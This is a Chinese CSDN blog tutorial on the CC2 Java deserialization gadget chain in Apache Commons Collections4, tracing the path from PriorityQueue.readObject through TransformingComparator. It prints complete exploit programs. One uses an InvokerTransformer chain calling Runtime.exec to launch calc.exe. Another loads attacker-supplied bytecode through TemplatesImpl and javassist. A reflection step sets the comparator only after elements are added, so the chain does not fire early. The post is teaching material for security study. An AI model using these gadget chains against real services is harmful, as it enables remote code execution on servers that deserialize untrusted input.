java反序列化之CC2超详细易懂分析

最新推荐文章于 2024-04-30 12:12:17 发布
最新推荐文章于 2024-04-30 12:12:17 发布
阅读量1.1k 收藏 27
点赞数 31
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79724395/article/details/137865461
版权

java反序列化之CC2分析

java反序列化之CC2分析

环境搭建

jdk 1.8

<dependencies>
        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-collections4</artifactId>
            <version>4.0</version>
        </dependency>

        <dependency>
            <groupId>org.javassist</groupId>
            <artifactId>javassist</artifactId>
            <version>3.22.0-GA</version>
        </dependency>
    </dependencies>

InvokerTransformer.transform()方法

在学习了cc1和cc3之后发现出口类无非两种
那么只需要调用InvokerTransformer.transform()或者TemplatesImpl的newTransformer

链子大概思考分析

根据原作者找到的一个类

TransformingComparator.class

    public int compare(I obj1, I obj2) {
        O value1 = this.transformer.transform(obj1);
        O value2 = this.transformer.transform(obj2);
        return this.decorated.compare(value1, value2);
    }

调用了transformer的transform方法,我们看看transformer是否可以控制,回到它的构造方法

public TransformingComparator(Transformer<? super I, ? extends O> transformer) {
        this(transformer, ComparatorUtils.NATURAL_COMPARATOR);
    }

可以看到是可以控制的,就是我们传入的值

那么谁可以调用compare呢
有点多,我们挑选一下,首先如果能在readobject里面最好
找一找有没有,但是没有,但是有一个类无限接近
PriorityQueue

    private void siftDownUsingComparator(int k, E x) {
        int half = size >>> 1;
        while (k < half) {
            int child = (k << 1) + 1;
            Object c = queue[child];
            int right = child + 1;
            if (right < size &&
                comparator.compare((E) c, (E) queue[right]) > 0)
                c = queue[child = right];
            if (comparator.compare(x, (E) c) <= 0)
                break;
            queue[k] = c;
            k = child;
        }
        queue[k] = x;
    }

调用了 comparator的compare方法
先看看 comparator是否可以控制,那就又要回到我们的构造方法

public PriorityQueue(int initialCapacity,
                         Comparator<? super E> comparator) {
        // Note: This restriction of at least one is not actually needed,
        // but continues for 1.5 compatibility
        if (initialCapacity < 1)
            throw new IllegalArgumentException();
        this.queue = new Object[initialCapacity];
        this.comparator = comparator;
    }

可以看到是可以控制的,也是我们传入的值
看看谁调用了siftDownUsingComparator
在PriorityQueue.siftdown

private void siftDown(int k, E x) {
        if (comparator != null)
            siftDownUsingComparator(k, x);
        else
            siftDownComparable(k, x);
    }

如果我们的comparator有值就会调用,当然有值,继续往上找
PriorityQueue的heapify()方法

 private void heapify() {
        for (int i = (size >>> 1) - 1; i >= 0; i--)
            siftDown(i, (E) queue[i]);
    }

继续找谁调用了heapify()
nice发现PriorityQueue的readobject方法调用了它

private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        // Read in size, and any hidden stuff
        s.defaultReadObject();

        // Read in (and discard) array length
        s.readInt();

        queue = new Object[size];

        // Read in all elements.
        for (int i = 0; i < size; i++)
            queue[i] = s.readObject();

        // Elements are guaranteed to be in "proper order", but the
        // spec has never explained what that might be.
        heapify();
    }

所以到这里,链子就结束了!!!很简单是吧
但是还是有很多细节是需要我们处理的

链子调试细节分析

上面的雏形已经清楚了,我们先给出exp再来调试,为的是学习清楚审计的过程

初始exp
package cc2;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;
import java.util.PriorityQueue;

public class Test{
    public static void main(String[] args) throws IOException,ClassNotFoundException {
        Transformer[] transformer = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                new InvokerTransformer("exec",new Class[]{String.class},new String[]{"C:\\Windows\\System32\\calc.exe"}),
        };
        Transformer chaintransformer = new ChainedTransformer(transformer);
        TransformingComparator comparator = new TransformingComparator(chaintransformer);
        PriorityQueue queue = new PriorityQueue(2,comparator);
        queue.offer(1);
        queue.offer(2);//调用offer()方法随便给队列中添加两个参数,调用add()也可以,add()最后也是调用的offer()方法。
        try{
            FileOutputStream filepath = new FileOutputStream("./CC2.ser");
            ObjectOutputStream object = new ObjectOutputStream(filepath);
            object.writeObject(queue);
        }
        catch (Exception e){
            e.printStackTrace();
        }
        try{
            FileInputStream filepath2 = new FileInputStream("./CC2.ser");
            ObjectInputStream input = new ObjectInputStream(filepath2);
            input.readObject();
        }
        catch (IOException error){
            error.printStackTrace();
        }
    }
}

开始调试分析
首先是来到TransformingComparator的构造函数

在这里插入图片描述
会调用this的下一个构造函数,就是下面那个,然后根据传入的参数为他们赋值

我们明明没有传入Comparator,但是又有值,哪里来的?
看到上面的构造函数是传入了一个
ComparatorUtils.NATURAL_COMPARATOR
看看是个什么东西

public static final Comparator NATURAL_COMPARATOR = ComparableComparator.comparableComparator();

给了我们一个默认的 Comparator

然后来到PriorityQueue的构造函数

在这里插入图片描述
还是赋值,第一个是容量的意思,第二个是comparator
可以看到下面成功赋值为我们希望的值
然后就是进入PriorityQueue的offer方法
发现在这里它就调用了siftUp(i, e)

public boolean offer(E e) {
        if (e == null)
            throw new NullPointerException();
        modCount++;
        int i = size;
        if (i >= queue.length)
            grow(i + 1);
        size = i + 1;
        if (i == 0)
            queue[0] = e;
        else
            siftUp(i, e);
        return true;
    }

下面的过程在上一节就讲过,就会调用我们的链子,最后触发我们的计算器
然后就会直接结束了,链子根本不会再往下走,也就不会反序列化了

解决问题

我们需要不让它在添加的时候就触发链子,那我们思考一下可不可以不使用这个函数

其实是不可以的,因为你要添加元素就得使用offer,当然你说add

 public boolean add(E e) {
        return offer(e);
    }

可以看到add底层也是调用的是offer
清楚了吧,然后就是回忆cc6的时候是不是也发送了这种情况呢?

当时map的put方法也会调用到hashcode方法,当时我们是传入一个fake transform方法
那这里,我们还记得当时有一条分叉路

  private void siftDown(int k, E x) {
        if (comparator != null)
            siftDownUsingComparator(k, x);
        else
            siftDownComparable(k, x);
    }

如果这个时候我们的comparator=null,那么就不会发生之后的事了,所以我们先不要传入comparator

让它把风头过了,再通过反射去修改就好了,我们直接动手实践起来

添加

Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
field.setAccessible(true);
field.set(queue,comparator);
最终的exp
package org.example;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class CC2{
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        Transformer[] transformer = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                new InvokerTransformer("exec",new Class[]{String.class},new String[]{"C:\\Windows\\WinSxS\\wow64_microsoft-windows-calc_31bf3856ad364e35_10.0.19041.1_none_6a03b910ee7a4073\\calc.exe"}),
        };
        Transformer chaintransformer = new ChainedTransformer(transformer);
        TransformingComparator comparator = new TransformingComparator(chaintransformer);
        PriorityQueue queue = new PriorityQueue(1);//创建实例。注意下面的顺序改变了。
        queue.add(1);
        queue.add(2);//传入两个参数
        Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");//反射获取成员变量的field
        field.setAccessible(true);//获取访问权限
        field.set(queue,comparator);//设置参数
        try{
            FileOutputStream filepath = new FileOutputStream("./CC2.ser");
            ObjectOutputStream object = new ObjectOutputStream(filepath);
            object.writeObject(queue);
        }
        catch (Exception e){
            e.printStackTrace();
        }
        try{
            FileInputStream filepath2 = new FileInputStream("./CC2.ser");
            ObjectInputStream input = new ObjectInputStream(filepath2);
            input.readObject();
        }
        catch (IOException error){
            error.printStackTrace();
        }
    }
}

我们现在再来调试,前面的就省了,因为前面的除了调用compare那里,其他地方都是一样的
直接来到readobject

要启动了,快上车
进入readobject方法
前面的还是省略了就是
heapify—siftDownComparable—comparato.compare

public int compare(I obj1, I obj2) {
        O value1 = this.transformer.transform(obj1);
        O value2 = this.transformer.transform(obj2);
        return this.decorated.compare(value1, value2);
    }

来到这在这里插入图片描述可以看到已经开始调用Transform的transform方法了
然后就是我们熟悉的CC1链了,清楚了吧
然后就是直接把我们的计算器给弹出来了
在这里插入图片描述这就是第一种方法,其实还算是比较简单的

TemplatesImpl的newTransformer方法

链子详细分析

你看这个内容之前,先看一篇文章
前面的我就不说了,因为都是需要调用到invoketrasform方法
区别就是从这里开始的
我们只需要调用我们的newTransformerImpl()方法就行了
好吧没什么好分析的呢
直接给exp

package cc2;

import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class CC2_Tem {
    public static void main(String[] args) throws Exception {
        //构造恶意类TestTemplatesImpl并转换为字节码
        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("cc2.TestTemplatesImpl");
        byte[] bytes = ctClass.toBytecode();
        System.out.println(bytes);

        //反射创建TemplatesImpl
        Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        Constructor<?> constructor = aClass.getDeclaredConstructor(new Class[]{});
        Object TemplatesImpl_instance = constructor.newInstance();

        //将恶意类的字节码设置给_bytecodes属性
        Field bytecodes = aClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(TemplatesImpl_instance, new byte[][]{bytes});

        //设置属性_name为恶意类名
        Field name = aClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(TemplatesImpl_instance, "TestTemplatesImpl");

        //构造利用链
        InvokerTransformer transformer = new InvokerTransformer("newTransformer", null, null);
        TransformingComparator transformer_comparator = new TransformingComparator(transformer);

        //触发漏洞
        PriorityQueue queue = new PriorityQueue(2);
        queue.add(1);
        queue.add(1);

        //设置comparator属性
        Field field = queue.getClass().getDeclaredField("comparator");
        field.setAccessible(true);
        field.set(queue, transformer_comparator);

        //设置queue属性
        field = queue.getClass().getDeclaredField("queue");
        field.setAccessible(true);
        //队列至少需要2个元素
        Object[] objects = new Object[]{TemplatesImpl_instance, TemplatesImpl_instance};
        field.set(queue, objects);

        //序列化 ---> 反序列化
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object object = ois.readObject();
    }
}

总结

抄一下图
在这里插入图片描述

参考https://www.cnblogs.com/byErichas/p/15749668.html

https://xz.aliyun.com/t/10387

nn0nkey k1n9
关注
  • 31
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
深入分析Java的序列化与反序列化
12-22
本文通过分析ArrayList的序列化来介绍Java序列化的相关内容。主要涉及到以下几个问题:  怎么实现Java的序列化  为什么实现了java.io.Serializable接口才能被序列化  transient的作用是什么  怎么自定义序列...
java反序列化之CC4详细易懂分析
2301_79724395的博客
04-22 434
当然,学习这个链子之前,你得好好把cc3和cc2给看明白,这样你学起来就会很简单,因为cc4就是cc2+cc3,当然这里我会再给你讲解一下类的作用,顺便给我复习,也给你讲明白,写得不容易,免费的赞点一下吧。
[Java反序列化]—Rome反序列化
Sentiment的博客
04-28 420
ROME可能是目前最完善的开源聚合工具,ROME支持绝大多数的RSS协议。
[JAVA反序列化] URLDNS
snowlyzz的博客
11-08 803
[Java反序列化]—URLDNS链 分析
commons-collections3(cc3)反序列化分析
遇事不决冲冲冲
03-10 2413
commons-collections3反序列化 cc3链和cc1想法还是很相似的,然后构造恶意类和调用使用了不同的两个新类 ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke()
java反序列化工具
11-21
java反序列化工具,覆盖jboss、weblogic、websphere。
java反序列化利用程序UI版Beta1.1.rar
07-20
java反序列化利用程序UI版Beta1.1.a
Java序列化与反序列化的实例分析讲解
08-26
今天小编就为大家分享一篇关于Java序列化与反序列化的实例分析讲解,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
Java反序列化实战.pdf
08-08
本议题将从那些经典案例入手,分析攻击方和防御方的对抗过程。会从fastjson与weblogic的两个经典漏洞,带大家傲游反序列化的世界。 反序列化入门 Fastjson Weblogic 反序列化防御
java方法重写(重点讲),方法重载
weixin_46281068的博客
04-27 971
一、方法重载定义:一个类中,出现多个方法的名称相同,但是它们的形参列表是不同的,那么这些方法就称为方法重载了。注意:一个类中,只要一些方法的名称相同、形参列表不同,那么它们就是方法重载了,其它的都不管(如:修饰符,返回值类型是否一样都无所谓)。形参列表不同指的是:形参的个数、类型、顺序不同,不关心形参的名称。应用场景:开发中我们经常需要为处理一类业务,提供多种解决方案,此时用方法重载来设计是很专业的。
Day25-Java基础之常用类1
m0_46053885的博客
04-27 925
同时我们发现Math类中的方法都是静态的,因此在使用的时候我们可以直接通过类名去调用。对于计算机而言,其实是没有数据类型的概念的,都是0101010101,数据类型是编程语言自己规定的,所以在实际存储的时候,先把具体的数字变成二进制,每32个bit为一组,存储在数组中。比较内存地址值一般情况下是没有意义的,我们希望比较的是对象的属性,如果两个对象的属性相同,我们认为就是同一个对象;如果我们的数据是一个浮点类型的数据,有的时候计算机并不会将这个数据完全转换成一个二进制数据,而是将这个将其转换成一个无限的。
Lambda表达式特点
weixin_57763462的博客
04-24 892
**API 设计**:Lambda 表达式鼓励使用函数式接口的设计模式,这改变了 Java 库的设计,例如 `java.util.function` 包下的一系列函数式接口。- **函数式编程**:Lambda 表达式引入了函数式编程的理念,使得 Java 更接近于函数式编程语言,如 Scala 和 Clojure。- **并发编程**:Lambda 表达式与 Java 8 新增的 Stream API 结合使用,可以简化并发编程,特别是与集合的操作相关。
Java解决最长公共前缀
无人罪的博客
04-28 243
编写一个函数来查找字符串数组中的最长公共前缀。如果不存在公共前缀,返回空字符串""。
MSE实现全链路灰度实践
云计算、数据库、大数据、深度学习、NLP、Python
04-24 470
待更新。
Java | 冒泡排序算法实现
yingzix688的博客
04-24 911
题目描述 编写一个Java程序,实现冒泡排序算法。程序需要能够接收一个整型数组作为输入,并输出排序后的数组。 冒泡排序是一种简单的排序算法,它重复地走访过要排序的数列,一次比较两个元素,如果他们的顺序错误就把他们交换过来。走访数列的工作是重复地进行直到没有再需要交换,也就是说该数列已经排序完成。
Spring cloud原理详解
qq_33449977的博客
04-28 354
想象一下,你开了一家餐馆,一开始只卖汉堡,后来生意火了,你又增加了炸鸡、披萨、冰淇淋各种摊位,每个摊位就是一个微服务,它们各自独立工作,但又得相互配合。有时候,某个服务可能太忙了,电话老打不通,这时候Spring Cloud还有个叫Hystrix的断路器,它会说:“嘿,别打了,那边线路忙,我给你个备用方案或者告诉你稍后再试。至于餐馆运营情况,Spring Cloud Sleuth和Zipkin这些工具,就像监控摄像头,记录服务间的每一次交互,方便你查看哪里出了问题,优化服务流程。
【限流】基于springboot(拦截器) + redis(执行lua脚本)实现注解限流
最新发布
qq_43209531的博客
04-30 255
基于springboot(拦截器) + redis(执行lua脚本)实现注解限流
公考学习平台|基于SprinBoot+vue的公考学习平台(源码+数据库+文档)
weixin_66413741的博客
04-30 842
本共享汽车管理系统有管理员和用户。管理员功能有个人中心,用户管理,投放地区管理,汽车信息管理,汽车投放管理,汽车入库管理,使用订单管理,汽车归还管理。用户可以在注册登录,可以对汽车进行使用产生订单,还可以归还。因而具有一定的实用性。本站是一个B/S模式系统,采用Spring Boot框架,MYSQL数据库设计开发,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得共享汽车管理系统管理工作系统化、规范化。
java反序列化
05-31
Java反序列化是将序列化后的字节数据还原成Java对象的过程。序列化是将Java对象转换为二进制数据以便于在网络上传输或保存在本地磁盘中,反序列化则是将这些二进制数据还原成Java对象,以便于在程序中进行使用。 反...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值